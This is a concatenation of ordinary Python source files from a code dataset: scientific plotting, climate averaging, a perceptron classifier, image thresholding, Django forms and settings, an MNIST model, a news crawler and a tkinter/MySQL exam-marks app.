a_height/2.), int(a_center + a_height/2.)]\n boundsB = [int(b_center - b_height/2.), int(b_center + b_height/2.)]\n boundsC = [int(c_center - c_height/2.), int(c_center + c_height/2.)]\n\n axl.plot(x_pixels, (x_pixels * slopeA) + boundsA[1], color = 'red', label='Stripe A')\n axl.plot(x_pixels, (x_pixels * slopeA) + boundsA[0], color = 'red')\n axl.plot(x_pixels, (x_pixels * slopeB) + boundsB[1], color = 'blue', label = 'Stripe B')\n axl.plot(x_pixels, (x_pixels * slopeB) + boundsB[0], color = 'blue')\n axl.plot(x_pixels, (x_pixels * slopeC) + boundsC[1], color = 'green', label = 'Stripe C')\n axl.plot(x_pixels, (x_pixels * slopeC) + boundsC[0], color = 'green')\n\n # flatten the spectra and add to right side plot #\n\n flattenx = np.sum(spec[1].data,axis=1)\n fakeaxis = np.arange(0,1024)\n\n axr = fig.add_axes([0.75,0.08,0.20,0.85])\n\n axr.plot(flattenx,fakeaxis,color='black')\n axr.plot([0,1200],[boundsA57[0]-2.,boundsA57[0]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsB57[0]-2.,boundsB57[0]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsC57[0]-2.,boundsC57[0]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsA57[1]-2.,boundsA57[1]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsB57[1]-2.,boundsB57[1]-2.],ls='dashed',color='gray')\n axr.plot([0,1200],[boundsC57[1]-2.,boundsC57[1]-2.],ls='dashed',color='gray')\n\n axr.plot([0,1200],[boundsA[0]-2.,boundsA[0]-2.],color='red')\n axr.plot([0,1200],[boundsA[1]-2.,boundsA[1]-2.],color='red')\n axr.plot([0,1200],[boundsB[0]-2.,boundsB[0]-2.],color='blue')\n axr.plot([0,1200],[boundsB[1]-2.,boundsB[1]-2.],color='blue')\n axr.plot([0,1200],[boundsC[0]-2.,boundsC[0]-2.],color='green')\n axr.plot([0,1200],[boundsC[1]-2.,boundsC[1]-2.],color='green')\n \n # calculate the flux being lost and add text to plot # \n totsumA = np.median(flattenx[boundsA57[0]:boundsA57[1]])\n totsumB = np.median(flattenx[boundsB57[0]:boundsB57[1]])\n totsumC = np.median(flattenx[boundsC57[0]:boundsC57[1]])\n \n inboxA = np.median(flattenx[boundsA[0]:boundsA[1]])\n inboxB = np.median(flattenx[boundsB[0]:boundsB[1]])\n inboxC = np.median(flattenx[boundsC[0]:boundsC[1]])\n \n lossA = np.abs(totsumA - inboxA) / totsumA * 100\n lossB = np.abs(totsumB - inboxB) / totsumB * 100\n lossC = np.abs(totsumC - inboxC) / totsumC * 100\n \n axr.text(0.5, 0.70, 'stripe C loss = ' + '{:.2f}'.format(lossC) + '%', color='black', fontsize = 13, ha = 'center', va = 'center', transform = axr.transAxes)\n axr.text(0.5, 0.35, 'stripe B loss = ' + '{:.2f}'.format(lossB) + '%', color='black', fontsize = 13, ha = 'center', va = 'center', transform = axr.transAxes)\n axr.text(0.5, 0.08, 'stripe A loss = ' + '{:.2f}'.format(lossA) + '%', color='black', fontsize = 13, ha = 'center', va = 'center', transform = axr.transAxes)\n\n # finish up the axes labels, etc. 
#\n\n                axl.set_xlabel('X FULL',fontsize=18)\n                axl.set_ylabel('Y FULL',fontsize=18)\n                axl.set_xlim([0,1200])\n                axl.set_ylim([100,500])\n                for tick in axl.xaxis.get_major_ticks():\n                    tick.label.set_fontsize(14)\n                for tick in axl.yaxis.get_major_ticks():\n                    tick.label.set_fontsize(14)    \n                for axis in ['top','bottom','left','right']:\n                    axl.spines[axis].set_linewidth(2)\n                axr.set_xlabel('Flux [counts/sec]',fontsize=18)\n                axr.set_ylabel('Y FULL',fontsize=18)\n                axr.set_ylim([100,500])\n                if 'faint' in folder:\n                    upperxlim = max(flattenx) + 10.\n                else: \n                    upperxlim = max(flattenx) + 100.\n                axr.set_xlim([0,upperxlim])\n                for tick in axr.xaxis.get_major_ticks():\n                    tick.label.set_fontsize(14)\n                for tick in axr.yaxis.get_major_ticks():\n                    tick.label.set_fontsize(14)    \n                for axis in ['top','bottom','left','right']:\n                    axr.spines[axis].set_linewidth(2)\n                axl.set_title(asn + ' ' + obj + '- h = ' + str(num) + ' - ' + opt_elem + ' - ' + str(cenwave) + 'A',fontsize=18)\n                axr.set_title('sum of x axis')\n                pdf.savefig()\n                plt.close()\n    print(folder)\n\n","sub_path":"makefltplots.py","file_name":"makefltplots.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"17366622","text":"import re\r\n\r\ndef chunks(l, n):\r\n    #Generator to yield n sized chunks from l\r\n    for i in range(0, len(l), n):\r\n        yield l[i: i + n]\r\n\r\nitems = []\r\nfile=\"C:/aaNeil/CET/cetdl.dat\"\r\n\r\nstrToWrite='dateString,tmin,tmax,precip\\n'\r\nclimFile = open(\"C:/aaNeil/CET/cet_tempprecip.csv\", 'r').readlines()\r\n\r\ncnt=0\r\nlag=7\r\n\r\nfor entry in climFile:\r\n\r\n    if (cnt>lag):\r\n        tminTot=0\r\n        tmaxTot=0\r\n        precipTot=0\r\n\r\n        date=climFile[cnt].strip().split(\",\")[0]\r\n        for day in range(0, lag):\r\n\r\n            tmin=float(climFile[cnt-day].strip().split(\",\")[1])\r\n            tmax=float(climFile[cnt-day].strip().split(\",\")[2])\r\n            precip=float(climFile[cnt-day].strip().split(\",\")[3])\r\n\r\n            if (tmin > -40):\r\n                tminTot=tminTot+tmin\r\n                tmaxTot=tmaxTot+tmax\r\n                precipTot=precipTot+precip\r\n        tminAve=round(tminTot/lag,1)\r\n        tmaxAve=round(tmaxTot/lag,1)\r\n        precipAve=round(precipTot/lag,1)\r\n\r\n        if (precipAve<0):\r\n            precipAve=-999\r\n        \r\n        strToWrite=strToWrite+ date + \",\" + str(tminAve) + \",\" + str(tmaxAve) + \",\" + str(precipAve) + \"\\n\"\r\n        \r\n    cnt=cnt+1\r\n\r\nwith open(\"C:/Apache/HTTP Server 2.2/htdocs/climviz/cet_v1/cetdaily_data/CE\"+str(lag)+\"DayLag.csv\", \"w\") as text_file:\r\n    text_file.write(strToWrite)\r\n","sub_path":"Scripts/Python/CET/create30DayLag.py","file_name":"create30DayLag.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"281852764","text":"import sys, string, math\nimport operator\n\nlist_stopwords = list()\ndict_features = dict()\nlist_words_in_line = list()\ntranslator = str.maketrans('', '', string.punctuation)\nb = 0\n\n#read stopwords file\ndef readStopWords():\n    fhand = open('stopwords.txt',encoding=\"utf8\")\n    for line in fhand:\n        list_stopwords.append(line.rstrip('\\n'))\n\nreadStopWords()\n\n#read the file and extend the stopword list with the rarest and most common words\ndef removeLowFrequencyWords():\n    dict_total_words = dict()\n    fhand = open(sys.argv[1],encoding=\"utf8\")\n    for line in fhand:\n        temp = dict()\n        words = line.split()\n        for i in range(3,len(words)):\n            word = words[i].lower().translate(translator).strip()\n            if not word == \"\":\n                if word.isalpha():\n                    if not word in list_stopwords:\n                        if word in dict_total_words:\n                            
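# first pass: count the document-wide frequency of every surviving token;\n                            # the rarest 10% and the 50 most common become extra stopwords below\n                            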
dict_total_words[word] += 1\n else:\n dict_total_words[word] = 1\n count_of_words = math.ceil(len(dict_total_words)*0.1)\n newA = dict(sorted(dict_total_words.items(), key=operator.itemgetter(1), reverse=False)[:count_of_words])\n list_stopwords.extend(list(newA))\n newB = dict(sorted(dict_total_words.items(), key=operator.itemgetter(1), reverse=True)[:50])\n list_stopwords.extend(list(newB))\n\nremoveLowFrequencyWords()\n\n\n#read training data\ndef readTrainingData():\n fhand = open(sys.argv[1],encoding=\"utf8\")\n for line in fhand:\n temp = dict()\n words = line.split()\n for i in range(3,len(words)):\n word = words[i].lower().translate(translator).strip()\n if not word == \"\":\n if word.isalpha():\n if not word in list_stopwords:\n if word in temp:\n temp[word] += 1\n else:\n temp[word] = 1\n if not word in dict_features:\n dict_features[word] = 0\n if words[1] == \"Fake\":\n temp['cls1'] = -1\n else:\n temp['cls1'] = 1\n if words[2] == 'Pos':\n temp['cls2'] = 1\n else:\n temp['cls2'] = -1\n list_words_in_line.append(temp)\n\nreadTrainingData()\n\n#train vanilla model\ndef trainCLass(className):\n global b\n for i in range(0,29):\n for words_in_line in list_words_in_line:\n y = words_in_line[className]\n a = 0\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n a += (words_in_line[word] * dict_features[word])\n if (y*a) <= 0:\n #update weights and bias\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n dict_features[word] = dict_features[word] + (y*words_in_line[word])\n b += y\n\ndef resetFeatures():\n global b\n b = 0\n #reset all weights to 0\n for word in dict_features:\n dict_features[word] = 0\n\n#write model to file\ndef writeModel(fdict,mode,fileName):\n f = open(fileName,mode,encoding=\"utf8\")\n f.write(str(b)+'\\n')\n f.write(str(fdict)+'\\n')\n f.close()\n\ntrainCLass('cls1')\nwriteModel(dict_features,\"w\",\"vanillamodel.txt\")\nresetFeatures()\ntrainCLass('cls2')\nwriteModel(dict_features,\"a+\",\"vanillamodel.txt\")\nresetFeatures()\n\n\n#train average model data\ndef trainAvgModel(className):\n dict_cached_features = dict_features.copy()\n beta = 0\n c = 1\n global b\n for i in range(0,29):\n for words_in_line in list_words_in_line:\n y = words_in_line[className]\n a = 0\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n a += (words_in_line[word] * dict_features[word])\n if (y*a) <= 0:\n #update weights and bias\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n dict_features[word] += (y*words_in_line[word])\n dict_cached_features[word] += (y*c*words_in_line[word])\n b += y\n beta += (y*c)\n c += 1\n b -= (beta/c)\n for word in dict_features:\n dict_features[word] -= (dict_cached_features[word]/c)\n\ntrainAvgModel('cls1')\nwriteModel(dict_features,\"w\",\"averagedmodel.txt\")\nresetFeatures()\ntrainAvgModel('cls2')\nwriteModel(dict_features,\"a+\",\"averagedmodel.txt\")\n\nprint(len(dict_features))\n","sub_path":"Coding Homework/Homework3/perceplearn3.py","file_name":"perceplearn3.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395832186","text":"import numpy as np\r\n#\r\n# NO MORE MODULES ALLOWED\r\n#\r\n\r\n#input - \t[2-D image]\r\n#output - \t[2-D image]\r\n#Implement Otsus thresholding\r\ndef otsu(image):\r\n histogram = np.histogram(image, bins=256,range = [0,256])[0]\r\n npixels = image.shape[0]*image.shape[1] + 0.0\r\n p0 = 0.0\r\n m0 = 0.0\r\n wtotal = 0.0\r\n 
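# wtotal accumulates the global mean intensity sum(i * p_i); Otsu's threshold is the cut\r\n    # that maximizes the between-class variance sigma = p0*p1*((m1/p1) - (m0/p0))**2\r\n    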
for i in range(0, 256):\r\n wtotal = wtotal + i * (histogram[i].item()/npixels)\r\n maximum = (0, -1)\r\n for i in range(0, 256):\r\n p0 = p0 + histogram[i].item()/npixels\r\n p1 = 1 - p0\r\n if p0 == 0 or p1 == 0:\r\n continue\r\n m0 = m0 + i * (histogram[i].item()/npixels)\r\n m1 = wtotal - m0\r\n sigma = p0*p1*(((m1/p1)-(m0/p0))**2)\r\n\r\n if sigma > maximum[0]:\r\n maximum = (sigma, i)\r\n\r\n nimg = image.copy()\r\n for r in range(0, len(image)):\r\n for v in range(0, len(image[0])):\r\n if image[r][v] > maximum[1]:\r\n nimg[r][v] = 255\r\n else:\r\n nimg[r][v] = 0\r\n\r\n return nimg\r\n\r\n","sub_path":"Task_3/Task3/Otsus.py","file_name":"Otsus.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168682610","text":"#!/usr/bin/env python\n\n# Setup the ALICE Yale Dev utils package\n\n# Derived from the setup.py in aliBuild\n# and based on: https://python-packaging.readthedocs.io/en/latest/index.html\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# Get the long description from the README file\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"alice_yale_dev_utils\",\n version=\"0.5\",\n\n description=\"ALICE Yale Dev Utils: Python utilities for analysis\",\n long_description=long_description,\n\n author=\"Raymond Ehlers\",\n author_email=\"raymond.ehlers@cern.ch\",\n\n url=\"https://gitlab.cern.ch/ALICEYale/alice-yale-dev\",\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n\n # Specify the Python versions you support here. 
In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2.7'\n ],\n\n # What does your project relate to?\n keywords='ALICE',\n\n packages=[\n \"aliceYaleDevUtils\"\n ],\n\n install_requires=[\n \"colorama\"\n ],\n\n # Include additional files\n include_package_data=True,\n\n setup_requires=[\n \"pytest-runner\"\n ],\n\n tests_require=[\n \"pytest\"\n ]\n )\n","sub_path":"analyses/utilities/aliceYaleDevUtils/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"209243228","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom game.round.models import Plot\nfrom .models import Survey, Settings\n\n\nclass RoundForm(forms.Form):\n guess = forms.DecimalField(required=True, max_digits=3, decimal_places=2)\n\n\nclass ExitSurvey(forms.ModelForm):\n class Meta:\n model = Survey\n fields = ['gender', 'age', 'feedback']\n\n def __init__(self, *args, **kwargs):\n super(ExitSurvey, self).__init__(*args, **kwargs)\n for f in ['gender', 'age', 'feedback']:\n self.fields[f].required = False\n\n\nclass SettingsForm(forms.ModelForm):\n class Meta:\n model = Settings\n fields = ['max_users', 'min_users', 'score_lambda', 'max_following', 'min_following', 'max_rounds']\n\n def clean(self):\n cleaned_data = self.cleaned_data\n if cleaned_data.get('max_users', 0) > cleaned_data.get('max_following', 0) > \\\n cleaned_data.get('min_following', 0) and cleaned_data.get('max_users', 0) > \\\n cleaned_data.get('min_users', 0) and cleaned_data.get('score_lambda', 1) and \\\n Plot.objects.all().count() >= cleaned_data.get('max_rounds') > 0:\n return cleaned_data\n\n raise ValidationError(\"Didn't meet logical constraints for the Settings model\")\n\n\nclass CheckForm(forms.Form):\n Q1_choices = (('1', 'Estimate the correlation of two variables'),\n ('2', 'Count the points in the picture'),\n )\n q1 = forms.ChoiceField(label='Your goal in the game is to', widget=forms.RadioSelect(attrs={'class': 'form-group'}),\n choices=Q1_choices)\n\n q2 = forms.DecimalField(label='The maximum correlation possible is', widget=forms.TextInput)\n\n q4 = forms.ChoiceField(label='In this game, all correlations will be', widget=forms.RadioSelect,\n choices=(('1', 'Negative or positive'),\n ('2', 'Only positive'),\n ))\n\n q5 = forms.ChoiceField(label='You will get a chance to change your estimate after your initial guess.',\n widget=forms.RadioSelect, choices=(('1', 'True'),\n ('2', 'False'),\n ))\n\n q6 = forms.ChoiceField(label='Have you participated in this study before?', widget=forms.RadioSelect,\n choices=(('1', 'No'),\n ('2', 'Yes'),\n ))\n\n def clean(self):\n cleaned_data = super(CheckForm, self).clean()\n q1 = cleaned_data.get('q1')\n q2 = float(cleaned_data.get('q2'))\n q4 = cleaned_data.get('q4')\n q5 = cleaned_data.get('q5')\n q6 = cleaned_data.get('q6')\n\n if q1 == '1' and q2 == 1 and q4 == '2' and q5 == '1' and q6 == '1':\n return cleaned_data\n raise forms.ValidationError('Some answers are wrong .. 
please go back and read the instructions carefully')\n","sub_path":"game/interactive/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"105281754","text":"from helper import *\n\nIMAGE_SIZE = 28 * 28\nCATEGORY_NUM = 10\nLEARNING_RATE = 0.1\nTRAINING_LOOP = 20000\nBATCH_SIZE = 100\nSUMMARY_DIR = 'log_softmax'\nSUMMARY_INTERVAL = 100\n\nmnist = input_data.read_data_sets('data', one_hot=True)\n\nwith tf.Graph().as_default():\n with tf.name_scope('input'):\n y_ = tf.placeholder(tf.float32, [None, CATEGORY_NUM], name='labels')\n x = tf.placeholder(tf.float32, [None, IMAGE_SIZE], name='input_images')\n\n with tf.name_scope('readout'):\n W = weight_variable([IMAGE_SIZE, CATEGORY_NUM], name='weight')\n b = bias_variable([CATEGORY_NUM], name='bias')\n y = tf.nn.softmax(tf.matmul(x, W) + b)\n\n with tf.name_scope('optimize'):\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n train_step = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cross_entropy)\n cross_entropy_summary = tf.scalar_summary('cross entropy', cross_entropy)\n\n with tf.Session() as sess:\n train_writer = tf.train.SummaryWriter(SUMMARY_DIR + '/train', sess.graph)\n test_writer = tf.train.SummaryWriter(SUMMARY_DIR + '/test', sess.graph)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n train_accuracy_summary = tf.scalar_summary('accuracy', accuracy)\n test_accuracy_summary = tf.scalar_summary('accuracy', accuracy)\n\n sess.run(tf.initialize_all_variables())\n for i in range(TRAINING_LOOP + 1):\n batch = mnist.train.next_batch(BATCH_SIZE)\n sess.run(train_step, {x: batch[0], y_: batch[1]})\n\n if i % SUMMARY_INTERVAL == 0:\n print('step %d' % i)\n summary = sess.run(tf.merge_summary([cross_entropy_summary, train_accuracy_summary]), {x: batch[0], y_: batch[1]})\n train_writer.add_summary(summary, i)\n summary = sess.run(tf.merge_summary([test_accuracy_summary]), {x: mnist.test.images, y_: mnist.test.labels})\n test_writer.add_summary(summary, i)\n","sub_path":"src/tensorflow/mnist_softmax.py","file_name":"mnist_softmax.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"354844133","text":"from model.models import Articles\nfrom parsers import get_parser\nfrom parsers import parsers\nfrom util import logger\nimport urllib.request\nimport traceback\n\nlog = logger.get(__name__)\n\n\ndef canonicalize_url(url):\n return url.split('?')[0].split('#')[0].strip()\n\n\ndef get_all_new_article_urls():\n ans = set()\n for parser in parsers:\n log.info('Looking up %s' % parser.domains)\n urls = parser.feed_urls()\n ans = ans.union(map(canonicalize_url, urls))\n log.debug('Got %s urls so far' % len(ans))\n return ans\n\n\ndef get_existing_urls(articles):\n return articles.get_all_urls_older_than(20)\n\n\ndef get_all_article_urls(articles):\n return get_all_new_article_urls().union(get_existing_urls(articles))\n\n\ndef load_article(url):\n try:\n parser = get_parser(url)\n except KeyError:\n log.info('Unable to parse domain, skipping')\n return\n try:\n parsed_article = parser(url)\n except (AttributeError, urllib.request.HTTPError, Exception) as e:\n if isinstance(e, urllib.request.HTTPError) and e.msg == 'Gone':\n return\n log.error('Exception when parsing %s', url)\n 
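# log the full traceback but keep crawling: one unparseable article should not\n        # abort the whole run, so fall through and return None for this URL\n        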
log.error(traceback.format_exc())\n        log.error('Continuing')\n        return\n    if not parsed_article.real_article:\n        return\n    return parsed_article\n\n\ndef update_articles():\n    articles = Articles()\n    all_urls = get_all_article_urls(articles)\n    log.info('Got all %s urls; storing to database' % len(all_urls))\n    for i, url in enumerate(all_urls):\n        log.debug('Woo: %d/%d is %s' % (i + 1, len(all_urls), url))\n        parsed_article = load_article(url)\n        if parsed_article is None:\n            continue\n        articles.save_entry(parsed_article, url)\n\n\ndef main():\n    update_articles()\n    pass\n\n\nif __name__ == '__main__':\n    main()","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"514069705","text":"from .. import *\n\nDEBUG = False\nCOMPRESS_ENABLED = True\n\nDATABASES = {\n    'default': {\n        # Choose between PostgreSQL or MySQL:\n        'ENGINE': 'django.db.backends.postgresql_psycopg2',\n        #'ENGINE': 'django.db.backends.mysql',\n        'NAME': '{{ project_name }}',\n        'USER': '{{ project_name }}',\n        'PASSWORD': '',\n    },\n}\n\nINSTALLED_APPS += (\n    #'gunicorn',\n)\n\nTEMPLATES[0]['OPTIONS']['loaders'] = (\n    ('django.template.loaders.cached.Loader', TEMPLATES[0]['OPTIONS']['loaders']),\n)\n\nALLOWED_HOSTS = (\n    '{{ project_name }}.testing.mycompany.tld',\n)\n\nCACHES['default']['KEY_PREFIX'] = '{{ project_name }}.beta'\n","sub_path":"project_name/settings/env/beta.py","file_name":"beta.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"505918932","text":"# ab is short for address book\nab = {\n    \"zhanghzenyang\": \"zhenyang0510@163.com\",\n    \"liyuepeng\": \"yuepeng@163.com\",\n    \"gaobing\": \"gaobing@163.com\"\n}\nprint(\"zhengyang's address is\", ab[\"zhanghzenyang\"])\n# delete one entry\ndel ab[\"zhanghzenyang\"]\nprint('There are {} contacts in the address-book\\n'.format(len(ab)))\nfor name, address in ab.items():\n    print('Contact {} at {}'.format(name, address))\n# add a new entry\nab['lengjiang'] = 'lejiang@163.com'\nif 'lengjiang' in ab:\n    print('\\nlengjiang\\'s address is',ab['lengjiang'])\n\n","sub_path":"ds_using_dict.py","file_name":"ds_using_dict.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"580177444","text":"#for GUI\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n\r\n#connecting with MySQL_database to store details.\r\nimport mysql.connector as sql\r\nmycon=sql.connect(host=\"localhost\",user=\"root\",passwd=\"sanju123\",database=\"Exam_Analysis\")\r\ncursor=mycon.cursor()\r\n\r\n#importing entermarks.py file to add all the marks to the database.\r\nfrom entermarks import *\r\n\r\n#showing graphs for analysing their performance\r\nimport matplotlib.pyplot as plt\r\n\r\n#student reg form (handled by teachers)\r\ndef Sregistration_form():\r\n\r\n    #window config.\r\n    windowR=Tk()\r\n    windowR.geometry(\"550x500\")\r\n    windowR.config(bg=\"light yellow\")\r\n    windowR.title(\"Registration form\")\r\n\r\n    #head label\r\n    label_0=Label(windowR,text=\"REGISTRATION FORM\",fg=\"black\",bg=\"light yellow\",relief=\"solid\",font=(\"Copperplate Gothic\",17,\"bold\"))\r\n    label_0.place(x=120,y=35)\r\n    \r\n    #adm label\r\n    label_1=Label(windowR,text=\"Adm No:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n    label_1.place(x=40,y=120)\r\n    entry_1=Entry(windowR,font=(\"Constantia\",18))\r\n    
entry_1.place(x=140,y=120)\r\n\r\n    #name label\r\n    label_2=Label(windowR,text=\"Name:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n    label_2.place(x=40,y=170)\r\n    entry_2=Entry(windowR,font=(\"Constantia\",18))\r\n    entry_2.place(x=140,y=170)\r\n\r\n    #class and sec label\r\n    label_3=Label(windowR,text=\"Class&Sec:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n    label_3.place(x=40,y=220)\r\n    entry_3=Entry(windowR,font=(\"Constantia\",18))\r\n    entry_3.place(x=140,y=220)\r\n\r\n    #ph no label\r\n    label_4=Label(windowR,text=\"Ph no:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n    label_4.place(x=40,y=270)\r\n    entry_4=Entry(windowR,font=(\"Constantia\",18))\r\n    entry_4.place(x=140,y=270)\r\n\r\n    #e mail label\r\n    label_5=Label(windowR,text=\"E mail:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n    label_5.place(x=40,y=320)\r\n    entry_5=Entry(windowR,font=(\"Constantia\",18))\r\n    entry_5.place(x=140,y=320)\r\n\r\n    #submit command\r\n    def reg_submit():\r\n        adm=entry_1.get()\r\n        name = entry_2.get()\r\n        cs=entry_3.get()\r\n        phn = entry_4.get()\r\n        email = entry_5.get()\r\n        pwd=\"123\"\r\n        user_id = name[0:3]+adm+\"@student.com\"\r\n\r\n        query = \"insert into studentt(name,adm_no,class_sec,ph_no,e_mail,user_id,pwd) values (%s,%s,%s,%s,%s,%s,%s)\"\r\n        val = (name,adm,cs,phn,email,user_id,pwd)\r\n        cursor.execute(query,val)\r\n        mycon.commit()\r\n        \r\n        label_6=Label(windowR,text=\"Success!\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n        label_6.place(x=220,y=400)\r\n\r\n        label_7=Label(windowR,text=\"Use \"+user_id+\" and \"+pwd+\" to log in \",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n        label_7.place(x=100,y=450)\r\n\r\n    #registration submit button\r\n    sub_find=Button(windowR,text=\"SUBMIT\",fg='white',bg='black',relief=RIDGE,font=(\"Constantia\",13),width=10,command=reg_submit)\r\n    sub_find.place(x=120,y=400)\r\n\r\n#find studs command\r\ndef findAll_studs(a):\r\n    query = \"select name,adm_no from studentt where class_sec=%s\"\r\n    cursor.execute(query,(a,))\r\n    detLi=[]\r\n    for i in cursor:\r\n        li=list(i)\r\n        DET=\"Name : \"+str(li[0])+\" Adm. no. 
\"+str(li[1])\r\n        detLi.append(DET)\r\n\r\n    #new window to display the student list.\r\n    windowList = Tk()\r\n    windowList.geometry(\"400x300\")\r\n    windowList.title(\"Exam Analysis\")\r\n    windowList.configure(bg=\"pink\")\r\n    \r\n    eve_list=Listbox(windowList,height=8,width=20, font=(\"Verdana\",17))\r\n    for i in range(len(detLi)):\r\n        eve_list.insert(i,detLi[i])\r\n    eve_list.place(x=20,y=10)\r\n\r\ndef checkreport(a):\r\n    query = \"select math_q,sci_q,eng_q,soc_q,math_h,sci_h,eng_h,soc_h,math_a,sci_a,eng_a,soc_a from studentt where adm_no=%s\"\r\n    val = (a,)\r\n    mark_list=[]\r\n    cursor.execute(query,val)\r\n    for i in cursor:\r\n        for j in i:\r\n            mark_list.append(j)\r\n    exams = ['Quarterly avg', 'Half yearly avg', 'Annual avg']\r\n    #finding average\r\n    if mark_list!=[]:\r\n        q = (mark_list[0]+mark_list[1]+mark_list[2]+mark_list[3])/4\r\n        h = (mark_list[4]+mark_list[5]+mark_list[6]+mark_list[7])/4\r\n        a = (mark_list[8]+mark_list[9]+mark_list[10]+mark_list[11])/4\r\n        values = [q, h, a]\r\n\r\n        plt.figure(figsize=(5, 5))\r\n        plt.ylabel('Marks')\r\n        plt.xlabel('Examinations')\r\n        plt.plot(exams, values)\r\n        plt.suptitle('Exam Performance Analysis')\r\n        plt.show()\r\n    else:\r\n        messagebox.showinfo(\"Exam Analysis\", \"Student does not exist.\")\r\n\r\ndef homepageT():\r\n    \r\n    windowT=Tk()\r\n    windowT.geometry(\"1000x700\")\r\n    windowT.title(\"Exam Analysis\")\r\n    windowT.configure(bg=\"pink\")\r\n\r\n    #school logo\r\n    logo=PhotoImage(master=windowT,file=\"SV-logo.png\")\r\n    label_p1=Label(windowT, image=logo)\r\n    label_p1.place(x=20,y=10)\r\n\r\n    #school name title\r\n    schname_label=Label(windowT,text=\"SARASWATHI VIDYALAYA\",bg=\"pink\",fg=\"black\",font=(\"Constantia\",27,\"bold\"))\r\n    schname_label.place(x=250,y=20)\r\n\r\n    #heading\r\n    head_label=Label(windowT,text=\"Examination Marks & Performance Analysis\",bg=\"pink\",fg=\"brown\",font=(\"Constantia\",22,\"bold\"))\r\n    head_label.place(x=210,y=90)\r\n\r\n    #student_reg button\r\n    button_studR=Button(windowT,text=\"Reg. Student\",fg='white',bg='light blue',relief=RIDGE,font=(\"Constantia\",17,\"bold\"),width=10,command=Sregistration_form)\r\n    button_studR.place(x=40,y=200)\r\n\r\n    #find students using class\r\n    find_label=Label(windowT,text=\"Find stud's adm. no:\",bg=\"pink\",fg=\"black\",font=(\"Constantia\",13))\r\n    find_label.place(x=620,y=160)\r\n    \r\n    listC=['9A','10A','11A','12A','9B','10B','11B','12B']\r\n    clas=StringVar()\r\n    droplistC=OptionMenu(windowT,clas, *listC)\r\n    clas.set(' ')\r\n    droplistC.config(width=10,font=(\"Constantia\",16),fg=\"red\")\r\n    droplistC.place(x=640,y=190)\r\n    \r\n    def send_find():\r\n        classs=clas.get()\r\n        findAll_studs(classs)\r\n\r\n    #find studs using class button\r\n    button_find=Button(windowT,text=\"Find\",fg='white',bg='black',relief=RIDGE,font=(\"Constantia\",13),width=10,command=send_find)\r\n    button_find.place(x=820,y=190)\r\n\r\n    #check report label\r\n    report_label=Label(windowT,text=\"Check Report:\",bg=\"pink\",fg=\"red\",font=(\"Constantia\",20,\"bold\"))\r\n    report_label.place(x=210,y=270)\r\n\r\n    #student's adm no. label\r\n    studA_label=Label(windowT,text=\"Stud's Adm. 
